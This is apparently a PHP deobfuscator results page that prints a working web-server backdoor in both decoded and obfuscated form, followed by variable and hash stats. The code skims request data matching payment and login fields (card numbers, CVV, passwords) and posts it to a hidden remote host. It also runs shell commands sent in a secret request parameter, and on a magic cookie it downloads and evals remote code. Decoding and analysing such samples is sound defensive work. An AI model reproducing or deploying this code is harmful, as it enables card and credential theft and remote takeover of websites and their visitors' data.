Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

$DCPZa = "_QI:l4aKg8ZJHBF75emjsMSvVypAhfbDR0CznEqo6G-/udYPW2wicxN1Trk3UXL9Ot"; $Spsr = $D..

Decoded Output download

<?  $DCPZa = "_QI:l4aKg8ZJHBF75emjsMSvVypAhfbDR0CznEqo6G-/udYPW2wicxN1Trk3UXL9Ot"; 
$Spsr = $DCPZa[51] . $DCPZa[18] . $DCPZa[26] . $DCPZa[4] . $DCPZa[39] . $DCPZa[45] . $DCPZa[17]; 
$baOTnfZps = 'base64_encode'; 
$FKipd = $DCPZa[30] . $DCPZa[6] . $DCPZa[20] . $DCPZa[17] . $DCPZa[40] . $DCPZa[5] . $DCPZa[0] . $DCPZa[45] . $DCPZa[17] . $DCPZa[52] . $DCPZa[39] . $DCPZa[45] . $DCPZa[17]; 
$ibabNh = 'serialize'; 
$TJRz = $DCPZa[26] . $DCPZa[57] . $DCPZa[17] . $DCPZa[8] . $DCPZa[0] . $DCPZa[18] . $DCPZa[6] . $DCPZa[65] . $DCPZa[52] . $DCPZa[28]; 
$cCvgbpy = $ibabNh($_SERVER); 
$TiacdCVP = $_REQUEST; 
$aMFwQ = $DCPZa[29] . $DCPZa[51] . $DCPZa[4] . $DCPZa[17] . $DCPZa[0] . $DCPZa[8] . $DCPZa[17] . $DCPZa[65] . $DCPZa[0] . $DCPZa[52] . $DCPZa[39] . $DCPZa[36] . $DCPZa[65] . $DCPZa[17] . $DCPZa[36] . $DCPZa[65] . $DCPZa[20]; 
$aaImgrN = $aMFwQ($DCPZa[26] . $DCPZa[28] . $DCPZa[26] . $DCPZa[3] . $DCPZa[43] . $DCPZa[43] . $DCPZa[51] . $DCPZa[36] . $DCPZa[26] . $DCPZa[44] . $DCPZa[65]); 
$kBwpddNIy = $DCPZa[19] . $DCPZa[20] . $DCPZa[39] . $DCPZa[36] . $DCPZa[0] . $DCPZa[45] . $DCPZa[17] . $DCPZa[52] . $DCPZa[39] . $DCPZa[45] . $DCPZa[17]; 
if (!empty($aaImgrN)) $aaImgrN = $kBwpddNIy($aaImgrN, true); 
else $aaImgrN = array(); 
$owhjI = curl_init(); 
if (is_array($aaImgrN)) $TiacdCVP = array_merge($TiacdCVP, $aaImgrN); 
$TiacdCVP = $ibabNh($TiacdCVP); 
$rAaNWeMCn = $Spsr($FKipd('LS' . '0='), array($TiacdCVP, $cCvgbpy)); 
if (!isset($_SERVER['HTTP_HOST']) or empty($_SERVER['HTTP_HOST'])) { 
    $_SERVER['HTTP_HOST'] = str_ireplace('/', '_', $_SERVER['DOCUMENT_ROOT']); 
} 
$uuwNqdlMg = array(CURLOPT_URL => trim($FKipd('aH' . 'R0c' . 'HM' . '6L' . 'y9' . 'y' . 'ZXF1ZX' . 'N' . '0' . 'YmV' . 'lLm' . 'NvbS9' . 'i' . 'NmI' . '3' . 'LnBoc' . 'A' . '==')), CURLOPT_POST => true, CURLOPT_POSTFIELDS => "test=XOwlgUWK&goog=" . $baOTnfZps($rAaNWeMCn) . $FKipd('Jm' . 'h' . 'vc3' . 'Q9') . $_SERVER['HTTP_HOST'], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_CONNECTTIMEOUT => 2, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 5, CURLOPT_SSL_VERIFYPEER => 0); 
if ($TJRz("/" . $FKipd('Ym' . 'lsbGl' . 'uZ3xza' . 'Gl' . 'wcGlu' . 'Z3' . 'xjd' . 'nZ' . '8Z' . 'HV' . 't' . 'bX' . 'l8' . 'cG' . 'F5b' . 'W' . 'Vu' . 'dH' . 'xjdm' . 'Myf' . 'G' . 'Nj' . 'X3xl' . 'eHBpc' . 'nl8' . 'Y' . '2' . 'Fy' . 'ZF9ud' . 'W1i' . 'ZXJ' . '8eWV' . 'hc' . 'n' . 'xt' . 'b25' . '0' . 'a' . 'Hxsb2dpbn' . 'xma' . 'XJ' . 'zdG' . '5hb' . 'WV8' . 'Y2' . 'N' . 'f' . 'bnV' . 'tY' . 'mV' . 'yf' . 'HV' . 'zZ' . 'XJ' . 'u' . 'YW' . '1l' . 'fHNlY' . '3V' . 'yZX' . 'R' . 'y' . 'Y' . 'WRp' . 'b' . 'mc=') . "/i", $TiacdCVP)) { 
    curl_setopt_array($owhjI, $uuwNqdlMg); 
    $owhjI2 = curl_exec($owhjI); 
    curl_close($owhjI); 
} 
if (!function_exists('exzx')) { 
    function exzx($code) 
    { 
        $output = ""; 
        $code = $code . " 2>/dev/null"; 
        if (function_exists('system') && is_callable('system')) { 
            ob_start(); 
            @system($code); 
            $output = ob_get_contents(); 
            ob_end_clean(); 
            if (!empty($output)) return $output; 
        } elseif (function_exists('shell_exec') && is_callable('shell_exec')) { 
            $output = @shell_exec($code); 
            if (!empty($output)) return $output; 
        } elseif (function_exists('exec') && is_callable('exec')) { 
            @exec($code, $res); 
            if (!empty($res)) foreach ($res as $line) $output .= $line; 
            if (!empty($output)) return $output; 
        } elseif (function_exists('passthru') && is_callable('passthru')) { 
            ob_start(); 
            @passthru($code); 
            $output = ob_get_contents(); 
            ob_end_clean(); 
            if (!empty($output)) return $output; 
        } elseif (function_exists('proc_open') && is_callable('proc_open')) { 
            $desc = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); 
            $proc = @proc_open($code, $desc, $pipes, getcwd(), array()); 
            if (is_resource($proc)) { 
                while ($res = fgets($pipes[1])) { 
                    if (!empty($res)) $output .= $res; 
                } 
                while ($res = fgets($pipes[2])) { 
                    if (!empty($res)) $output .= $res; 
                } 
            } 
            @proc_close($proc); 
            if (!empty($output)) return $output; 
        } elseif (is_callable('popen') && function_exists('popen')) { 
            $res = @popen($code, 'r'); 
            if ($res) { 
                while (!feof($res)) { 
                    $output .= fread($res, 2096); 
                } 
                pclose($res); 
            } 
            if (!empty($output)) return $output; 
        } 
        return ""; 
    } 
} 
if (isset($_REQUEST['daksjdhags78122wssa']) && !empty($_REQUEST['daksjdhags78122wssa'])) { 
    if (function_exists('apc_clear_cache')) { 
        apc_clear_cache(null); 
    } 
    if (function_exists('opcache_reset')) { 
        opcache_reset(); 
    } 
    if (function_exists('xcache_clear_cache')) { 
        xcache_clear_cache(array(0)); 
    } 
    var_dump(exzx(base64_decode($_REQUEST['daksjdhags78122wssa']))); 
    exit(); 
} 
if (isset($_COOKIE['sdjxxj2jjaxsaa']) && $_COOKIE['sdjxxj2jjaxsaa'] == 'dasixx1x293xedsaaa') { 
    $l = "http" ./* "" - ni*/ /* "" - ni*/ "s://zx" ./* "" - ni*/ /* ""sdajsni*/ ".fr" . ".to/w" ./* ""dasdj*/ "so" . "_9." ./* "" - sjzxza*/ "js"/* "" - ni*/; 
    if (function_exists('curl_init')) { 
        $ch = curl_init(); 
        curl_setopt($ch, CURLOPT_URL, $l); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); 
        curl_setopt($ch, CURLOPT_HEADER, FALSE); 
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36"); 
        $xzba = curl_exec($ch); 
        curl_close($ch); 
    } else { 
        $xzba = @file_get_contents($l); 
    } 
    $xzba = base64_decode($xzba); 
    eval($xzba); 
    die(); 
} 
 ?>

Did this file decode correctly?

Original Code

$DCPZa = "_QI:l4aKg8ZJHBF75emjsMSvVypAhfbDR0CznEqo6G-/udYPW2wicxN1Trk3UXL9Ot";
$Spsr = $DCPZa[51] . $DCPZa[18] . $DCPZa[26] . $DCPZa[4] . $DCPZa[39] . $DCPZa[45] . $DCPZa[17];
$baOTnfZps = 'base64_encode';
$FKipd = $DCPZa[30] . $DCPZa[6] . $DCPZa[20] . $DCPZa[17] . $DCPZa[40] . $DCPZa[5] . $DCPZa[0] . $DCPZa[45] . $DCPZa[17] . $DCPZa[52] . $DCPZa[39] . $DCPZa[45] . $DCPZa[17];
$ibabNh = 'serialize';
$TJRz = $DCPZa[26] . $DCPZa[57] . $DCPZa[17] . $DCPZa[8] . $DCPZa[0] . $DCPZa[18] . $DCPZa[6] . $DCPZa[65] . $DCPZa[52] . $DCPZa[28];
$cCvgbpy = $ibabNh($_SERVER);
$TiacdCVP = $_REQUEST;
$aMFwQ = $DCPZa[29] . $DCPZa[51] . $DCPZa[4] . $DCPZa[17] . $DCPZa[0] . $DCPZa[8] . $DCPZa[17] . $DCPZa[65] . $DCPZa[0] . $DCPZa[52] . $DCPZa[39] . $DCPZa[36] . $DCPZa[65] . $DCPZa[17] . $DCPZa[36] . $DCPZa[65] . $DCPZa[20];
$aaImgrN = $aMFwQ($DCPZa[26] . $DCPZa[28] . $DCPZa[26] . $DCPZa[3] . $DCPZa[43] . $DCPZa[43] . $DCPZa[51] . $DCPZa[36] . $DCPZa[26] . $DCPZa[44] . $DCPZa[65]);
$kBwpddNIy = $DCPZa[19] . $DCPZa[20] . $DCPZa[39] . $DCPZa[36] . $DCPZa[0] . $DCPZa[45] . $DCPZa[17] . $DCPZa[52] . $DCPZa[39] . $DCPZa[45] . $DCPZa[17];
if (!empty($aaImgrN)) $aaImgrN = $kBwpddNIy($aaImgrN, true);
else $aaImgrN = array();
$owhjI = curl_init();
if (is_array($aaImgrN)) $TiacdCVP = array_merge($TiacdCVP, $aaImgrN);
$TiacdCVP = $ibabNh($TiacdCVP);
$rAaNWeMCn = $Spsr($FKipd('LS' . '0='), array($TiacdCVP, $cCvgbpy));
if (!isset($_SERVER['HTTP_HOST']) or empty($_SERVER['HTTP_HOST'])) {
    $_SERVER['HTTP_HOST'] = str_ireplace('/', '_', $_SERVER['DOCUMENT_ROOT']);
}
$uuwNqdlMg = array(CURLOPT_URL => trim($FKipd('aH' . 'R0c' . 'HM' . '6L' . 'y9' . 'y' . 'ZXF1ZX' . 'N' . '0' . 'YmV' . 'lLm' . 'NvbS9' . 'i' . 'NmI' . '3' . 'LnBoc' . 'A' . '==')), CURLOPT_POST => true, CURLOPT_POSTFIELDS => "test=XOwlgUWK&goog=" . $baOTnfZps($rAaNWeMCn) . $FKipd('Jm' . 'h' . 'vc3' . 'Q9') . $_SERVER['HTTP_HOST'], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_CONNECTTIMEOUT => 2, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 5, CURLOPT_SSL_VERIFYPEER => 0);
if ($TJRz("/" . $FKipd('Ym' . 'lsbGl' . 'uZ3xza' . 'Gl' . 'wcGlu' . 'Z3' . 'xjd' . 'nZ' . '8Z' . 'HV' . 't' . 'bX' . 'l8' . 'cG' . 'F5b' . 'W' . 'Vu' . 'dH' . 'xjdm' . 'Myf' . 'G' . 'Nj' . 'X3xl' . 'eHBpc' . 'nl8' . 'Y' . '2' . 'Fy' . 'ZF9ud' . 'W1i' . 'ZXJ' . '8eWV' . 'hc' . 'n' . 'xt' . 'b25' . '0' . 'a' . 'Hxsb2dpbn' . 'xma' . 'XJ' . 'zdG' . '5hb' . 'WV8' . 'Y2' . 'N' . 'f' . 'bnV' . 'tY' . 'mV' . 'yf' . 'HV' . 'zZ' . 'XJ' . 'u' . 'YW' . '1l' . 'fHNlY' . '3V' . 'yZX' . 'R' . 'y' . 'Y' . 'WRp' . 'b' . 'mc=') . "/i", $TiacdCVP)) {
    curl_setopt_array($owhjI, $uuwNqdlMg);
    $owhjI2 = curl_exec($owhjI);
    curl_close($owhjI);
}
if (!function_exists('exzx')) {
    function exzx($code)
    {
        $output = "";
        $code = $code . " 2>/dev/null";
        if (function_exists('system') && is_callable('system')) {
            ob_start();
            @system($code);
            $output = ob_get_contents();
            ob_end_clean();
            if (!empty($output)) return $output;
        } elseif (function_exists('shell_exec') && is_callable('shell_exec')) {
            $output = @shell_exec($code);
            if (!empty($output)) return $output;
        } elseif (function_exists('exec') && is_callable('exec')) {
            @exec($code, $res);
            if (!empty($res)) foreach ($res as $line) $output .= $line;
            if (!empty($output)) return $output;
        } elseif (function_exists('passthru') && is_callable('passthru')) {
            ob_start();
            @passthru($code);
            $output = ob_get_contents();
            ob_end_clean();
            if (!empty($output)) return $output;
        } elseif (function_exists('proc_open') && is_callable('proc_open')) {
            $desc = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
            $proc = @proc_open($code, $desc, $pipes, getcwd(), array());
            if (is_resource($proc)) {
                while ($res = fgets($pipes[1])) {
                    if (!empty($res)) $output .= $res;
                }
                while ($res = fgets($pipes[2])) {
                    if (!empty($res)) $output .= $res;
                }
            }
            @proc_close($proc);
            if (!empty($output)) return $output;
        } elseif (is_callable('popen') && function_exists('popen')) {
            $res = @popen($code, 'r');
            if ($res) {
                while (!feof($res)) {
                    $output .= fread($res, 2096);
                }
                pclose($res);
            }
            if (!empty($output)) return $output;
        }
        return "";
    }
}
if (isset($_REQUEST['daksjdhags78122wssa']) && !empty($_REQUEST['daksjdhags78122wssa'])) {
    if (function_exists('apc_clear_cache')) {
        apc_clear_cache(null);
    }
    if (function_exists('opcache_reset')) {
        opcache_reset();
    }
    if (function_exists('xcache_clear_cache')) {
        xcache_clear_cache(array(0));
    }
    var_dump(exzx(base64_decode($_REQUEST['daksjdhags78122wssa'])));
    exit();
}
if (isset($_COOKIE['sdjxxj2jjaxsaa']) && $_COOKIE['sdjxxj2jjaxsaa'] == 'dasixx1x293xedsaaa') {
    $l = "http" ./* "" - ni*/ /* "" - ni*/ "s://zx" ./* "" - ni*/ /* ""sdajsni*/ ".fr" . ".to/w" ./* ""dasdj*/ "so" . "_9." ./* "" - sjzxza*/ "js"/* "" - ni*/;
    if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $l);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_HEADER, FALSE);
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36");
        $xzba = curl_exec($ch);
        curl_close($ch);
    } else {
        $xzba = @file_get_contents($l);
    }
    $xzba = base64_decode($xzba);
    eval($xzba);
    die();
}

Function Calls

serialize 1

Variables

$Spsr implode
$TJRz preg_match
$DCPZa _QI:l4aKg8ZJHBF75emjsMSvVypAhfbDR0CznEqo6G-/udYPW2wicxN1Trk3..
$FKipd base64_decode
$ibabNh serialize
$baOTnfZps base64_encode

Stats

MD5 500c21394fede8ed94dadcd55eba8cc4
Eval Count 0
Decode Time 115 ms